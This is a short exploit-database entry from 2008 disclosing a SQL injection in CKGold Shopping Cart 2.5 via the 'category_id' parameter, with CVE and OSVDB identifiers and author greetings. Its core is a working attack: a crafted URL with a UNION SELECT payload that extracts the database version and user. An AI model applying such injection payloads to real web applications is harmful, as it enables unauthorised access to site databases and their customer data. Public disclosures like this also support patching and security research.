CKGold Shopping Cart 2.5 - 'category_id' SQL Injection

Author: Cr@zy_King
type: webapps
platform: php
port: 
date_added: 2008-05-26  
date_updated: 2016-11-30  
verified: 1  
codes: OSVDB-45654;CVE-2008-2774  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 5678.txt  
Cr@zy_King / crazy_kinq@hotmail.co.uk

CKGold Shopping Cart 2.5 (category_id) SQL Injection Vulnerability

Script page : http://cartkeeper.com

Demo Page : http://ckgold.cartkeeper.com

Commercial License Price: $99.00
Commercial License Price: $79.95  :|

http://localhost/item.php?item_id=-1&category_id=Sql

Sql : 27+group+by+tbl_item.item_id+union+select+1,version(),3,user()/*

Greatz : aLL My Friendz & Coderx & Code Hunters & str0ke

-------

# milw0rm.com [2008-05-27]